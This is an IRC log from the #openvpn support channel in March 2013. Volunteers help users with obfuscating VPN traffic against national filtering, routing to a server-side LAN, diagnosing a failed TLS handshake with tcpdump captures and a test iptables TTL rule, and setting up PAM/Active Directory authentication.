21:01 < M1L0> blocked??? why? 21:02 < ddlk> China is building the word largest local network ~ 21:02 < M1L0> ok 21:03 < ddlk> wondering if there is some vpn tech that cannot be detected 21:04 < ngharo> i've heard using static keys in openvpn makes traffic harder to identify 21:05 -!- ddlk [~ddlk@183.246.96.216] has quit [] 21:05 -!- ddlk [~ddlk@183.246.96.216] has joined #openvpn 21:06 < ddlk> already tried that, no luck 21:07 < ngharo> !obfsproxy 21:07 <@vpnHelper> "obfsproxy" is (#1) For a writeup on using obfsproxy with OpenVPN see https://syria.hacktivist.me/?p=148 or (#2) See also !obfs. The link to TrafficObfuscation also contains a setup example 21:07 < ngharo> might try that too 21:08 < pekster> There's that, or using static key crypto 21:08 < pekster> !statickey 21:08 <@vpnHelper> "statickey" is (#1) you can use static keys by using --secret or (#2) static keys only work for ptp links, not client/server. They also do not provide forward encryption. A forward-secure encryption scheme (such as openvpn uses with certs) protects secret keys from exposure by evolving the keys with time. or (#3) see !forwardsecurity for more info 21:10 < ddlk> thanks for the article, trying :D 21:12 < M1L0> question: VPN clients need to see a segment inside my LAN and internet can also leave the proxy, can someone guide me? 21:13 < pekster> What's your goal? I'm unclear from that what you want 21:13 < pekster> !goal 21:13 <@vpnHelper> "goal" is Please clearly state your goal for your vpn: example, I would like to access the lan behind the server , I would like to access the internet over my vpn , I just want a secure connection between 2 computers , etc 21:15 < M1L0> sorry my english is no good... :P 21:15 < M1L0> my external VPN clients do not see my LAN segment and have no internet... 21:15 < pekster> What do you want? You want clients to have access to the server-side LAN? 21:17 < M1L0> exactly 21:17 < pekster> !serverlan 21:17 <@vpnHelper> "serverlan" is (#1) for a lan behind a server, the server must have ip forwarding enabled (!ipforward), the server needs to push a route for its lan to clients, and the router of the lan the server is on needs a route added to it (!route_outside_openvpn) or (#2) see !route for a better explanation or (#3) Handy troubleshooting flowchart: http://ircpimps.org/serverlan.png 21:17 < pekster> So that's a list of steps you need, and #3 in that output gives you a helpful flowchart to follow to expose a LAN on the server-side of OpenVPN 21:19 < M1L0> Ok, I'll see the diagram now, thanks! 21:59 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Quit: ZNC - http://znc.in] 22:01 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn 22:07 -!- Devastator [~devas@186.214.110.30] has quit [Ping timeout: 256 seconds] 22:08 -!- Devastator [~devas@186.214.110.30] has joined #openvpn 22:11 -!- Devastator- [~devas@186.214.110.30] has joined #openvpn 22:12 -!- Devastator [~devas@186.214.110.30] has quit [Read error: Connection reset by peer] 22:13 -!- M1L0 [~M1L0@unaffiliated/m1l0] has left #openvpn ["Saliendo"] 22:14 -!- Devastator- [~devas@186.214.110.30] has quit [Changing host] 22:14 -!- Devastator- [~devas@unaffiliated/devastator] has joined #openvpn 22:14 -!- Devastator- is now known as Devastator 22:23 -!- HyperGlide [~HyperGlid@li385-100.members.linode.com] has quit [Remote host closed the connection] 22:27 -!- p3rror [~mezgani@41.249.96.133] has joined #openvpn 22:28 -!- Denial- [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has quit [] 22:37 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 22:46 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 23:09 -!- corretico [~luis@190.211.93.38] has joined #openvpn 23:10 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 23:41 -!- ddlk [~ddlk@183.246.96.216] has quit [] 23:45 -!- brute11k [~brute@89.249.235.131] has joined #openvpn --- Day changed Wed Mar 13 2013 00:28 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 00:42 -!- Wulf [~Wulf@unaffiliated/wulf] has joined #openvpn 00:45 -!- p3rror [~mezgani@41.249.96.133] has quit [Ping timeout: 258 seconds] 00:58 -!- p3rror [~mezgani@ds-59836.dedicados.laniway.com.br] has joined #openvpn 01:13 -!- p3rror [~mezgani@ds-59836.dedicados.laniway.com.br] has quit [Ping timeout: 255 seconds] 01:13 -!- digilink [~digilink@unaffiliated/digilink] has quit [Ping timeout: 264 seconds] 01:27 -!- mjixx [~markus@80.67.14.31] has quit [Ping timeout: 252 seconds] 01:27 -!- mjixx [~markus@80.67.14.31] has joined #openvpn 01:32 -!- p3rror [~mezgani@41.249.96.133] has joined #openvpn 01:40 -!- xbanux [~xbanux@115.254.75.113] has joined #openvpn 01:44 -!- digilink [~digilink@unaffiliated/digilink] has joined #openvpn 02:09 -!- xbanux [~xbanux@115.254.75.113] has quit [Read error: Connection reset by peer] 02:09 -!- xbanux [~xbanux@115.254.75.113] has joined #openvpn 02:22 -!- mattock [~mattock@openvpn/corp/admin/mattock] has left #openvpn [] 02:28 < pekster> ecrist: More to come, but this is now usable and mostly (minus the pkcs11 support) anagalous to Easy-RSA 2.x support. https://github.com/QueuingKoala/easy-rsa 02:29 <@vpnHelper> Title: QueuingKoala/easy-rsa · GitHub (at github.com) 02:29 -!- xbanux [~xbanux@115.254.75.113] has quit [Ping timeout: 240 seconds] 02:29 -!- xbanux [~xbanux@115.254.75.113] has joined #openvpn 02:46 -!- twb [~twb@203.7.155.73] has quit [Ping timeout: 264 seconds] 02:48 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 02:53 -!- xtz [xtz@DeathStar.Techn0.eu] has joined #openvpn 03:01 -!- novaflash_away is now known as novaflash 03:05 -!- TMcTrain [~kvirc@p54BBB9D2.dip.t-dialin.net] has quit [Read error: Connection reset by peer] 03:05 -!- TMcTrain [~kvirc@p54BBB9D2.dip.t-dialin.net] has joined #openvpn 03:13 -!- TMcTrain [~kvirc@p54BBB9D2.dip.t-dialin.net] has quit [Ping timeout: 248 seconds] 03:22 -!- josheee12 [~jsteiner@131.91.7.1] has joined #openvpn 03:24 < josheee12> hey, guys. out of nowhere, openvpn just quit on me. the ports are fine on both ends (1 client, 1 server), i've tried tcp and udp, but i get stuck at the handshake. the time is correct on both client and server, and both systems are running debian with openvpn 2.3.0. configs and logs are here: http://pastebin.com/mqHmBcQG. 03:25 < josheee12> does anyone have any suggestions? 03:35 < pppingme> what port are you really using? the server and client config have two different ports? 03:35 < Wulf> josheee12: tcpdump. 03:36 < josheee12> my apologies, that's something i fixed right before i posted. i'll switch to tcpdump and try in a moment. 03:36 < pppingme> packets are obviously making it, don't think you're going to see too much with tcpdump quite yet.. 03:37 < pppingme> why are you using 443? 03:37 < Wulf> pppingme: probably to avoid firewalls 03:37 < pppingme> assuming that, just want to know for sure 03:37 < Wulf> I also have my vpn running on 443 03:37 -!- TMcTrain [~kvirc@HSI-KBW-046-005-044-083.hsi8.kabel-badenwuerttemberg.de] has joined #openvpn 03:38 < josheee12> it's not to avoid firewalls typically, but i use different networks often and typically 443's open. 03:39 < josheee12> i sometimes use port 53 for the same reason. 03:40 < pppingme> what are all the extra W's in the logs? 03:40 < pppingme> is that just something you hosed when you captured the log, or are they really there? 03:40 < josheee12> iirc, that's from udp packets with verb 5. 03:46 < pppingme> you've tried ports other than 443, right? 03:46 < josheee12> yes, and both udp and tcp. 03:46 < pppingme> have you tried THIS client (is it a laptop or what) from a different internet connection? 03:47 < josheee12> yes. 03:47 -!- TMcTrain [~kvirc@HSI-KBW-046-005-044-083.hsi8.kabel-badenwuerttemberg.de] has quit [Quit: KVIrc 4.0.2 Insomnia http://www.kvirc.net/] 03:47 < josheee12> it's a laptop. 03:47 -!- TMcTrain [~kvirc@HSI-KBW-046-005-044-083.hsi8.kabel-badenwuerttemberg.de] has joined #openvpn 03:47 < pekster> josheee12: Lots of WWW's and no RR's means that you're not getting the return TLS handshake data from the server. Both sides get "Initial packet received", so see if the server really sends the UDP packets after the initial one? They're evidently not making it to the client 03:48 -!- brute11k [~brute@89.249.235.131] has quit [Ping timeout: 252 seconds] 03:49 < josheee12> pekster: i presume i should do so by changing to TCP and using tcpdump? 03:49 < pppingme> you're usually best to use UDP 03:49 < pekster> huh? no 03:50 < pppingme> unless there's a good reason to use tcp 03:50 < josheee12> wait, does tcpdump work with udp? 03:50 < pppingme> yes 03:50 < pekster> tcpdump -pni eth0 udp port 443 03:50 < pekster> man tcpdump 03:50 < josheee12> oh, sorry. 03:50 < pppingme> the name is misleading.. 03:50 < josheee12> that it is. 03:51 -!- brute11k [~brute@89.249.235.131] has joined #openvpn 03:52 < josheee12> the client is doing a number of writes, but the server doesn't seem to get them. 03:53 < pppingme> can you ping the server cleanly from the client? You aren't seeing a ton of packet loss or anything are you? 03:54 < josheee12> tcpdump: http://pastebin.com/KSsX1A1t 03:54 < josheee12> ifconfig reports none dropped on either end. 03:55 < josheee12> pings work fine. 03:56 < pppingme> this has worked before, or is this a new setup? 03:56 < josheee12> it's worked for months. 03:59 < pppingme> are there other clients that use this same server? are they working or broke? 03:59 -!- kubbing [~kubbing@89.177.146.18] has joined #openvpn 04:00 < josheee12> this is the only client as of right now. i can install openvpn on a virtual machine as a test if need be, although i'd generally like to avoid it. 04:00 < pppingme> when is the last time it worked? 04:01 < josheee12> last time i tried to go online with this computer was roughly 4 days ago. 04:01 < pppingme> tried? so it worked? 04:01 < josheee12> yes. 04:02 < pppingme> ok, the ever important question, what has changed since last time it worked? 04:02 < josheee12> literally nothing except daylight savings time. after it stopped working, i upgraded both the client and server to the latest release. 04:03 < pppingme> so you updated after it broke in an attempt to fix it? or you updated then it broke? 04:03 < josheee12> i updated in an attempt to fix. 04:03 <@EugeneKay> "nothing changed except everything" 04:05 < pekster> Why would ifconfig report dropped packets which it never received? 04:05 < pekster> You need to dump BOTH ends. Then you compare then packets sent on the server that obviously aren't getting to your client 04:05 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has joined #openvpn 04:05 < josheee12> alright. 04:05 < pppingme> as a general rule, after something breaks is the WORST time to start doing upgrades 04:06 < pppingme> but yeah, start by doing tcpdumps on both and compare, see if packets are getting lost 04:06 < josheee12> will do 04:06 < pekster> Honestly, we prefer people here use the latest version 04:07 < josheee12> i'm changing to port 5555, only because i've got a lot of stuff up on this computer and i'd expect unrelated traffic on 443 as a result. 04:08 < pppingme> generally agree that current versions are good, but if you do an upgrade when you're broke, you don't know if the upgrade is further complicating whatever is broke... the only exception is if you know for sure that there is a fix for your specific problem in the upgrade. 04:08 < pekster> josheee12: What on earth are you running on UDP port 443 04:09 < pekster> It's not going to match web traffic. That uses TCP... 04:09 < josheee12> very true, i feel like a moron at the moment. 04:09 < pekster> No clue what else you're expecting to use UDP 443. 04:11 < josheee12> there's clearly packet loss, a number are being sent client-side and never get received. 04:12 < pppingme> from the client, "ping -c 240 -f serverip" 04:13 < pppingme> and paste the two stat lines 04:13 < pekster> Judging by The W's and no R's on the client, same is true in reverse (looks like the server isn't verb 5 in the logs from earlier.) If your network connection is bad enough that it can't negotiate a TLS handshake in the 60 second window, you need to fix that first 04:15 < josheee12> pppingme: "ping: cannot flood; minimal interval, allowed for user, is 200ms" 04:15 < pppingme> do it as root 04:15 < pppingme> or sudo 04:16 < josheee12> pekster: i'm currently on a 10gbps fibre line, i doubt it's an issue with the network itself. 04:16 < pekster> And these 2 systems are direcly connected via a fiber network to each other? 04:16 < josheee12> pekster: no 04:16 -!- xtz [xtz@DeathStar.Techn0.eu] has quit [Ping timeout: 250 seconds] 04:16 < pekster> If they're not, you have a slew of routers between each system that could all be causing problems. Active filtering, misconfigured routers, MTU issues, transparent proxying 04:16 < pekster> List goes on 04:17 < pppingme> ping results? 04:17 < josheee12> pppingme: can i paste those 2 lines directly here? 04:17 -!- xbanux [~xbanux@115.254.75.113] has quit [Ping timeout: 264 seconds] 04:17 < pppingme> yeah, its jsut two lines 04:17 < josheee12> 240 packets transmitted, 240 received, 0% packet loss, time 3194ms 04:17 < josheee12> rtt min/avg/max/mdev = 29.134/29.911/49.147/1.823 ms, pipe 4, ipg/ewma 13.364/29.502 ms 04:18 < pppingme> hmm, thats clean'ish, try a larger count, 2500 04:19 < josheee12> pekster: the traceroute only has 10 hops. most of them are level 3 (all but 3), so i'd be surprised if it was the network of the server or client. 04:19 < pekster> What's that going to accomplish? TLS handshakes send on the order of a dozen packets, not 2500 04:19 < pppingme> luck, timing, just trying to show any packet loss at all.. 04:19 < pppingme> if we don't get any with the larger sample, its probably some kind of filtering or flood control 04:19 < pekster> ... 04:20 < josheee12> there was still 0% loss. 04:20 < pppingme> what was the avg and max time on that one? 04:21 < pekster> josheee12: Can you cloudshark the results from 'tcpdump -pni eth0 udp port 443' from both client & server ends starting from when you attempt to connect with the client? 04:21 < josheee12> 29.6/32.5. 04:21 < pekster> It's curious that you get 'initial packet received' messages on both ends but no return packets that verb 5 catches on your client 04:21 < pppingme> super reasonable, doesn't look like typical packet loss, did you chagne any iptable rules on either end? 04:22 -!- zz_AsadH is now known as AsadH 04:23 < pekster> I'd like to see what the received sent/received looks like on both ends. It's possible you have a PMTU problem on the link between the hosts. Ultimately if you have dropped/filtered/otherwise-undeliverable packets on your control channel, that needs to get fixed 04:24 < josheee12> no. only rules on the client are to make a few IP ranges use eth0 , and only rules on the server are postrouting for openvpn. pekster, how do you suggest i do that? 04:25 < pekster> tcpdump -pni eth0 -w capture.pcap udp port 443 04:25 < josheee12> pekster: just tcpdump and pipe to files? 04:25 < pekster> capture, send to www.cloudshark.org 04:25 < josheee12> k 04:26 < pekster> Be sure to start it on both ends before you connect the client; I want to see that initial packet they both send, and then see what else doesn't make the connection 04:27 < josheee12> alright. give me a moment for everything to time out. 04:27 < pekster> If you bounce both ends services it'll do so without needing 60 seconds for it to fail 04:28 < pekster> Disconnecting the client is instant; the client won't try any more if it's not running ;) 04:31 < josheee12> client: http://www.cloudshark.org/captures/03af6807d7d7 04:31 <@vpnHelper> Title: CloudShark (at www.cloudshark.org) 04:31 < josheee12> server: http://www.cloudshark.org/captures/40d461d0e1ad 04:31 <@vpnHelper> Title: CloudShark (at www.cloudshark.org) 04:32 -!- ngharo_ [~ngharo@hacked.thegov.us] has joined #openvpn 04:32 -!- Varazir_ [~mircwars@c-94-255-130-176.cust.bredband2.com] has joined #openvpn 04:34 -!- AsadH is now known as AsadH_runsaway 04:35 < pekster> Yea, weird, the server just "never gets" anything after the first 3 packets are exchanged 04:35 -!- AsadH_runsaway is now known as AsadH 04:35 < pekster> Almost looks to me like some IDS or DPI system is eating them 04:36 -!- Netsplit *.net <-> *.split quits: ngharo, paccer, pa, Varazir 04:36 < pekster> The lost packets are low enough it wouldn't be MTU issues either 04:39 < josheee12> i reside at my uni, so the traffic goes laptop->personal router->building router->school main router->FLR (our isp)->level 3->tinet->2 internal switches->openvz host node->server VPS. 04:39 < pekster> I don't know what traceroute tool you have, but can you try watching tcpdmp on the server (interactive is fine, no need to cloudshark this) and see if you get a hit when you do this on the client: traceroute -F -p 5555 -q 3 04:39 < pekster> Ah, then you very likely have DPI/IDS done to stop you 04:40 < pekster> You can try to trace things, but my guess is that they've blocked OpenVPN for a reason, or possibly a variety of traffic that openvpn falls into a rule for 04:40 < josheee12> why would this suddenly stop working? they haven't changed any hardware (all network upgrades are announced) in my building or centrally. 04:40 < pekster> Someone changed something somewhere? 04:40 * pekster shrugs 04:41 < pekster> Your issue is obvious: packets don't arrive where they're supposed to. In fact, by varying the TTL of the outgoing packets, you can probably see exactly where they get dropped 04:41 < josheee12> i just texted my friend who also uses openvpn here to see if he's had issues. 04:42 < pekster> Something like this is very bad to set in production, but for testing, will match those UDP packets that are 151 bytes long, but not the first 3 that are smaller: 04:43 < pekster> iptables -t mangle -A POSTROUTING -m udp -p udp --dport 5555 -m length --length 100: -j TTL --ttl-set 4 04:43 < pekster> Play around with the TTL to see what 2 adjacent values do produce and then don't produce an ICMP error for TTL expired 04:44 < pekster> That's your "naughty" host doing the filtering 04:44 < josheee12> alright 04:44 < pekster> Oh, and edit the rule, not just keep adding new ones :P 04:44 < pekster> But, your issue isn't openvpn anymore; it's some packet filtering system 04:44 -!- pa [~pa@unaffiliated/pa] has joined #openvpn 04:44 < josheee12> according to my friend who uses openvpn here, it's not an issue for him. 04:45 < josheee12> i may disconnect for a second, i didn't think to try wifi as an alternative. 04:46 -!- josheee121 [~jsteiner@131.91.4.12] has joined #openvpn 04:47 -!- josheee12 [~jsteiner@131.91.7.1] has quit [Quit: Leaving.] 04:49 -!- josheee12 [~jsteiner@131.91.7.1] has joined #openvpn 04:51 -!- josheee121 [~jsteiner@131.91.4.12] has quit [Ping timeout: 258 seconds] 04:55 < josheee12> it's definitely an issue with my network, i can't connect to my friend's server, either. which is surprising, because he was using the wireless and it worked earlier today. sorry for all the hassle. 04:56 < pekster> Bonus points if you can find the responsible router IP and give it to your netadmins. Or publish it in a school paper; maybe then the guys at netops will think twice before rolling out packet filtering without notice ;) 04:58 < josheee12> lol. it can literally only be 1 of 2 routers. i personally know a decent portion of the netadmins, so i'll be stopping by the IT office tomorrow to inquire further. 05:03 -!- brute11k [~brute@89.249.235.131] has quit [Ping timeout: 246 seconds] 05:06 -!- brute11k [~brute@89.249.235.131] has joined #openvpn 05:06 -!- kubbing [~kubbing@89.177.146.18] has quit [Remote host closed the connection] 05:06 < josheee12> the funniest part, in my opinion, is that the school itself uses openvpn. 05:07 < josheee12> (for certain remote access things for employees; i also work for the school and have to use openvpn for certain work) 05:21 -!- JSharpe [~JSharpe@46.165.208.207] has joined #openvpn 05:32 -!- dazo_afk is now known as dazo 05:36 -!- kubbing [~kubbing@89.177.146.18] has joined #openvpn 05:46 -!- gffa [~unknown@unaffiliated/gffa] has joined #openvpn 06:00 -!- kubbing [~kubbing@89.177.146.18] has quit [Remote host closed the connection] 06:08 -!- mndo [~mndo@bl17-85-80.dsl.telepac.pt] has joined #openvpn 06:11 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 06:16 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 06:31 -!- josheee12 [~jsteiner@131.91.7.1] has left #openvpn ["PING 1363174178"] 06:37 -!- paccer [uid4847@gateway/web/irccloud.com/x-yfkfkdnmzaewasrg] has joined #openvpn 06:42 -!- mustu [~maan@unaffiliated/mustu] has quit [Ping timeout: 256 seconds] 07:11 -!- sw0rdfish [sw0rdfish@unaffiliated/sw0rdfish] has quit [Read error: Connection reset by peer] 07:16 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 07:18 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 240 seconds] 07:20 -!- mustu [~maan@182.185.186.30] has joined #openvpn 07:20 -!- mustu is now known as Guest40046 07:26 -!- Varazir_ is now known as Varazir 07:46 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 240 seconds] 07:49 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 08:14 -!- Holiday [~rjr162@magichat.dlt.psu.edu] has quit [Read error: Connection reset by peer] 08:21 -!- TheWarden [~chatzilla@S0106e0469a3d83ef.ss.shawcable.net] has joined #openvpn 08:25 -!- mnathani [~mnathani@198-84-231-11.cpe.teksavvy.com] has quit [] 08:27 -!- sw0rdfish [sw0rdfish@fr2.v6.nightmare.panicbnc.eu] has joined #openvpn 08:30 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has quit [Ping timeout: 258 seconds] 08:32 -!- sw0rdfish [sw0rdfish@fr2.v6.nightmare.panicbnc.eu] has quit [Changing host] 08:32 -!- sw0rdfish [sw0rdfish@unaffiliated/sw0rdfish] has joined #openvpn 08:41 -!- kubbing [~kubbing@ip-89-176-96-114.net.upcbroadband.cz] has joined #openvpn 08:45 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has joined #openvpn 08:48 -!- xtz [xtz@DeathStar.Techn0.eu] has joined #openvpn 08:48 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 09:03 -!- xbanux [~xbanux@115.254.75.113] has joined #openvpn 09:10 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 09:10 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn 09:28 -!- marksaitis [~marksaiti@194.168.230.106] has joined #openvpn 09:31 -!- Guest40046 [~maan@182.185.186.30] has quit [Ping timeout: 264 seconds] 09:40 -!- fahmad [~linux@unaffiliated/fahmad] has joined #openvpn 09:44 -!- mustu [~maan@119.63.130.93] has joined #openvpn 09:44 -!- mustu is now known as Guest21539 09:52 < tabakhase> arg? 09:52 < tabakhase> is than channel on a mode to "not be joinable by web clients"? 09:53 < tabakhase> nerv... how ever, so im back on my desk for present8ing you that fancy logfile of a linux client that "stoped working" after it where working yesterday - http://nopaste.info/f3e4079ebb.html 09:54 < tabakhase> it goes ok - ok -ok - dead. 10:09 -!- erry [erry@freenode/staff/erry] has quit [Ping timeout: 608 seconds] 10:12 <@plaisthos> tabakhase: ban mask on webchannel user? 10:14 <@dazo> yes, web irc clients are banned ... as it's only noise from those visitors 10:14 <@dazo> * stupid user logs in 10:14 <@dazo> stupid user> WHy doesn't it work? 10:14 <@dazo> * stupid user logs out 10:15 < fahmad> hey dazo 10:15 < fahmad> plaisthos :) 10:15 -!- erry [erry@freenode/staff/erry] has joined #openvpn 10:16 < tabakhase> ;D - btw my problem is fixed, diont bother checking the log 10:16 < fahmad> :) 10:17 -!- Bakz [~meh@58.34.36.134] has quit [Quit: Leaving] 10:17 < tabakhase> seems "someone" only typed the restart command into the shell but missed hitting the enter button... 10:18 -!- raidz_away is now known as raidz 10:20 < fahmad> great 10:25 < fahmad> dazo: i have senario; if i have openvpn server running on machine which have 10 static ip addresses located in New York, and i want one of my client in Germany connect to VPN server and get static ip into his DD-WRT Router and if we ping it from internet not from server it will give us ping response any idea on this ? 10:26 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 10:31 -!- xtz [xtz@DeathStar.Techn0.eu] has quit [Quit: leaving] 10:31 -!- mndo [~mndo@bl17-85-80.dsl.telepac.pt] has quit [Ping timeout: 258 seconds] 10:35 -!- mndo [~mndo@bl17-85-80.dsl.telepac.pt] has joined #openvpn 10:39 -!- marksaitis [~marksaiti@194.168.230.106] has quit [Ping timeout: 258 seconds] 10:44 -!- Guest21539 [~maan@119.63.130.93] has quit [Ping timeout: 264 seconds] 10:50 -!- mustu [~maan@119.63.130.93] has joined #openvpn 10:50 -!- mustu is now known as Guest2561 10:55 -!- TheWarden_ [~chatzilla@S0106e0469a3d83ef.ss.shawcable.net] has joined #openvpn 10:56 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has quit [Read error: Connection reset by peer] 10:56 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has joined #openvpn 10:58 -!- TheWarden [~chatzilla@S0106e0469a3d83ef.ss.shawcable.net] has quit [Ping timeout: 260 seconds] 10:58 -!- TheWarden_ is now known as TheWarden 10:59 -!- Guest2561 [~maan@119.63.130.93] has quit [Ping timeout: 260 seconds] 11:04 -!- mcp [~mcp@wolk-project.de] has quit [Read error: Operation timed out] 11:06 -!- b00gz_ [uid6869@gateway/web/irccloud.com/x-pgmyjmlyrhmelakt] has quit [Ping timeout: 245 seconds] 11:07 -!- mustu_ [~maan@119.63.130.93] has joined #openvpn 11:12 -!- mcp [~mcp@wolk-project.de] has joined #openvpn 11:13 -!- AsadH is now known as zz_AsadH 11:18 -!- mustu_ [~maan@119.63.130.93] has quit [Ping timeout: 264 seconds] 11:26 -!- riot [~riot@eris.hackerfleet.org] has joined #openvpn 11:26 < riot> hi. 11:26 < riot> i'm trying to run a vpn on a host-only virtualbox interface that shares a network with all running VMs, but my clients can only ping the vpn server not the rest of the net 11:27 -!- kubbing [~kubbing@ip-89-176-96-114.net.upcbroadband.cz] has quit [Remote host closed the connection] 11:32 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 11:35 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 11:35 < TheWarden> ahh I'm pretty new to OpenVPN, is this web GUI shown here http://openvpn.net/index.php/access-server/docs/admin-guides/190-how-to-authenticate-users-with-active-directory.html for the commercial OpenVPN product or OpenVPN Community edition? 11:35 <@vpnHelper> Title: How to authenticate users with Active Directory (at openvpn.net) 11:52 < TheWarden> where do I get this auth pam so I can authenticated the VPN to active directory? 11:54 < TheWarden> even if PAM is the answer, where the heck are the plugins? I don't seem to have it 11:55 < tabakhase> riot what is your config line claiming the ips/net? 11:55 < tabakhase> riot youre looking for something similar to "server-bridge 172.20.23.254 255.255.254.0 172.20.22.50 172.20.22.250" 11:57 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has quit [Read error: Connection reset by peer] 12:00 -!- mustu [~maan@221.120.210.138] has joined #openvpn 12:00 -!- mustu is now known as Guest56224 12:03 -!- fahmad [~linux@unaffiliated/fahmad] has quit [] 12:04 -!- Guest56224 [~maan@221.120.210.138] has quit [Ping timeout: 240 seconds] 12:05 -!- mustu_ [~maan@119.63.130.93] has joined #openvpn 12:11 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has joined #openvpn 12:13 -!- KaiForce [~chatzilla@adsl-70-228-81-145.dsl.akrnoh.ameritech.net] has joined #openvpn 12:15 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has quit [Remote host closed the connection] 12:15 < TheWarden> in order to have my OpenVPN server authenticate to Active Directory do I have to have the server itself joined to the domain? 12:16 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has joined #openvpn 12:21 <@dazo> TheWarden: that URL is to the Access Server (commercial version) 12:22 <@dazo> TheWarden: for PAM auth ... that should be shipped in your openvpn package (Community Edition) .... and the rest of the PAM stuff, is whatever your OS shipped with 12:23 <@dazo> TheWarden: try to look into /usr/lib*/openvpn ... or some places like that 12:23 -!- kubbing [~kubbing@89.177.146.18] has joined #openvpn 12:24 -!- GabrieleV_ [~GabrieleV@host190-79-static.230-95-b.business.telecomitalia.it] has quit [Ping timeout: 260 seconds] 12:24 <@dazo> TheWarden: but for LDAP auth (which you most likely need for AD auth ... maybe RADIUS is another alternative) ... then you need an auth-ldap ... which is kind of trickier ... there are a few alternatives, but I've never dug into any of them for real yet 12:25 <@dazo> but some people do the Linux<->AD integration and then add openvpn + auth-pam on top of that 12:31 < TheWarden> dazo: I installed Samba via git. 12:31 <@dazo> TheWarden: then you probably use winbind? 12:32 -!- TMcTrain [~kvirc@HSI-KBW-046-005-044-083.hsi8.kabel-badenwuerttemberg.de] has quit [Ping timeout: 248 seconds] 12:32 -!- kubbing [~kubbing@89.177.146.18] has quit [Ping timeout: 252 seconds] 12:33 < TheWarden> dazo: See I'm in this situation, I don't know if I need PAM or LDAP or both. Yes believe I am, as Samba 4 comes with it. 12:33 < TheWarden> so what I need is Linux to auth to active directory, openvpn to auth to active directory, and so on. 12:34 <@dazo> TheWarden: I've never played with Samba4 ... so I'm on really thin ice .... but I'd guess, if you can login into your Linux box with the username/password from a Windows account ... then you most likely need PAM 12:34 < TheWarden> ahh I found the shared object for auth-pam in /usr/lib/openvpn 12:34 <@dazo> you don't need both PAM and LDAP ... only one of them can be used at the same time in OpenVPN 12:35 < TheWarden> and I understand that Samba 4 has LDAP builtin 12:35 <@dazo> PAM is usefull, if you basically want the same auth schema as for your Linux users on that box 12:35 < uberushaximus> apparently samba is to the point where you configure it from a windows client 12:35 < uberushaximus> and it can do the whole AD forest 12:35 -!- master_o1_master [~master_of@p4FF24F8F.dip.t-dialin.net] has joined #openvpn 12:36 <@dazo> and LDAP is useful to use if you want have "virtual users" on your VPN ... they are not known users for the Linux box itself 12:36 <@dazo> (but of course, you can do Linux login auth via LDAP as well ... but that's another chapter) 12:37 <@dazo> Yes, Samba4 ships with a lot of stuff embedded .... like krb5 support and LDAP .... but that's to be able to behave like an AD controller (or whatever the proper name is in the Microsoft world) 12:38 < TheWarden> dazo: in my case, the linux systems are servers. The samba 4/openvpn in on a linux server.. all users work on a workstation. So then PAM would be the answer? 12:38 <@dazo> I'd try that first 12:38 <@dazo> that's easiest 12:38 -!- BasicXP [~basicxp@ubuntu/member/BasicXP] has quit [Quit: Have to go. Good bye!] 12:39 < TheWarden> okay, so areyou saying that if pam is setup then I can login to those servers using active directory? 12:39 -!- master_of_master [~master_of@p4FF24746.dip.t-dialin.net] has quit [Ping timeout: 260 seconds] 12:39 <@dazo> TheWarden: if you have configured your Linux boxes so that Windows users can log into with the accounts, then yes 12:40 < TheWarden> dazo: well I don't think I do presently but I'm going to join it to the domain the servers so in theory they should be able to login. 12:40 <@dazo> I know from the Samba 3.x world that to make that work, you need the winbind daemon running ... which maps Windows accounts to Unix accounts, which makes them able to log-in 12:41 <@dazo> but it is possible to do all this with LDAP too ... but I have no clue how to configure that, and esp. not against a Windows AD server 12:42 < TheWarden> ok 12:43 -!- kubbing [~kubbing@89.177.146.18] has joined #openvpn 12:44 < TheWarden> dazo: so you mean something like this, http://www.skelleton.net/2012/08/03/joining-a-debian-server-to-active-directory/? 12:44 <@vpnHelper> Title: Joining a Debian Server to Active Directory | skelleton.net (at www.skelleton.net) 12:45 <@dazo> TheWarden: that sounds quite correct ... and it uses even krb5 for authentication, which is good too 12:46 < TheWarden> dazo: mmm yet he suggests installing winbind but I have winbind and I have been able to kinit username already 12:47 <@dazo> TheWarden: you need winbind too ... that provides the mapping service between Windows user IDs to Unix user IDs 12:47 < TheWarden> dazo: oh okay, so that would explain why I don't 